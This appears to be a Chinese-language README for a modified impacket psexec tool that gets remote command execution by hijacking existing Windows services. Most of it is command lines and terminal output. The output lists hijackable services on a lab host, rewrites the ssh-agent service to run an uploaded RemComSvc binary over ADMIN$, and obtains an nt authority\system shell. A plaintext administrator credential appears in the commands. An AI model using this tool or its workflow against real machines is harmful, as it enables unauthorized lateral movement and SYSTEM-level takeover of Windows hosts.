本代码基于impacket包0.13版本,如果你机器上是0.12版本需要执行如下命令替换兼容
sed -i "s/logger\.init(\s*options\.ts\s*,\s*options\.debug\s*)/logger.init(options.debug)/" psexec2.py找到你本地impacket包中serviceinstall.py的位置将servicechange.py放置在同目录
┌──(wackymaker㉿kali)-[/usr/lib/python3/dist-packages/impacket/examples]
└─$ dir
1.py logger.py os_ident.py rpcdatabase.py serviceinstall.py
__init__.py mssqlshell.py __pycache__ secretsdump.py smbclient.py
ldap_shell.py ntlmrelayx remcomsvc.py servicechange.py utils.py
可以使用-service-list输出当前机器允许更改二进制的服务路径
┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker$263389'@192.168.174.154 -service-list
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Listing services on 192.168.174.154
[*] Listing all services on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service 1394ohci
[*] Querying service 3ware
[*] Querying service ACPI
.............
[*] Querying service cbdhsvc_ac2c1
[*] Querying service CDPUserSvc_ac2c1
[*] Querying service ConsentUxUserSvc_ac2c1
[*] Querying service CredentialEnrollmentManagerUserSvc_ac2c1
[-] Error getting service info for CredentialEnrollmentManagerUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service DeviceAssociationBrokerSvc_ac2c1
[-] Error getting service info for DeviceAssociationBrokerSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service DevicePickerUserSvc_ac2c1
[*] Querying service DevicesFlowUserSvc_ac2c1
[*] Querying service PimIndexMaintenanceSvc_ac2c1
[*] Querying service PrintWorkflowUserSvc_ac2c1
[-] Error getting service info for PrintWorkflowUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Querying service UdkUserSvc_ac2c1
[*] Querying service UnistoreSvc_ac2c1
[*] Querying service UserDataSvc_ac2c1
[*] Querying service WpnUserService_ac2c1
[*] Suitable for hijacking: 22
========================================================================================================================
SUITABLE SERVICES FOR HIJACKING - 192.168.174.154
========================================================================================================================
SERVICE NAME START TYPE STATUS ACCOUNT PRIORITY
------------------------------------------------------------------------------------------------------------------------
AppVClient DISABLED STOPPED LocalSystem 1
SensorDataService DISABLED STOPPED LocalSystem 1
ssh-agent DISABLED STOPPED LocalSystem 1
UevAgentService DISABLED STOPPED LocalSystem 1
WSearch DISABLED STOPPED LocalSystem 1
diagnosticshub.standardcollect MANUAL STOPPED LocalSystem 2
msiserver MANUAL STOPPED LocalSystem 2
NtFrs MANUAL STOPPED LocalSystem 2
RpcLocator MANUAL STOPPED LocalSystem 2
SecurityHealthService MANUAL STOPPED LocalSystem 2
SgrmBroker MANUAL STOPPED LocalSystem 2
TieringEngineService MANUAL STOPPED localSystem 2
vmvss MANUAL STOPPED LocalSystem 2
wmiApSrv MANUAL STOPPED localSystem 2
ALG MANUAL STOPPED NT AUTHORITY\Lo 3
SNMPTRAP MANUAL STOPPED NT AUTHORITY\Lo 3
NetTcpPortSharing MANUAL STOPPED LocalSystem 4
PerfHost MANUAL STOPPED NT AUTHORITY\Lo 4
RSoPProv MANUAL STOPPED LocalSystem 4
edgeupdatem MANUAL STOPPED LocalSystem 13
MicrosoftEdgeElevationService MANUAL STOPPED LocalSystem 13
WMPNetworkSvc MANUAL STOPPED NT AUTHORITY\Ne 14
========================================================================================================================
Total suitable services: 22
========================================================================================================================之后我们使用-service-change会进入劫持分支,不再创建服务而是更改现有服务二进制路径
┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker$263389'@192.168.174.154 -service-change ssh-agent
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Executing command via service hijacking: cmd.exe
[*] Using specified service: ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Selected service for hijacking: ssh-agent
[*] Preparing service hijacking...
[*] Checking if service needs restoration to original state...
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service appears to be hijacked, attempting to restore original configuration...
[*] Restoring original service configuration for ssh-agent...
[*] Stopping service ssh-agent before restoration...
[*] Opening SVCManager on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Restoring service configuration...
[*] - Binary Path:
[*] - Start Type: 3
[*] - Start Name: LocalSystem
[*] Service configuration restored successfully
[*] Service restored to default configuration
[*] Backing up configuration for service ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service backup completed:
[*] - Binary Path: C:\Windows\System32\OpenSSH\ssh-agent.exe
[*] - Start Type: 3
[*] - Start Name: LocalSystem
[*] Using default RemComSvc executable
[*] Requesting shares on 192.168.174.154.....
[*] Found writable share ADMIN$
[*] Uploading file <impacket.examples.remcomsvc.RemComSvc object at 0x7f72a3f616d0> to System32\dVCRvXEW.exe
[*] File uploaded successfully
[*] Hijacking service ssh-agent with payload: C:\Windows\System32\dVCRvXEW.exe
[*] Opening SVCManager on 192.168.174.154.....
[*] Service configuration modified successfully
[*] Starting service to execute payload...
[*] Service hijacked successfully, now executing command...
[*] Executing command through hijacked service...
[!] Press help for extra shell commands [-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.169]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����
C:\Windows\system32>chcp65001 Active code page: 65001
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
在正常退出时,会进行服务恢复,确保环境正常
C:\Windows\system32>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Stopping hijacked service after command execution...
[*] Opening SVCManager on 192.168.174.154.....
[*] Service ssh-agent stopped successfully此劫持路径兼容psexec原有所有参数包括-file -c -path等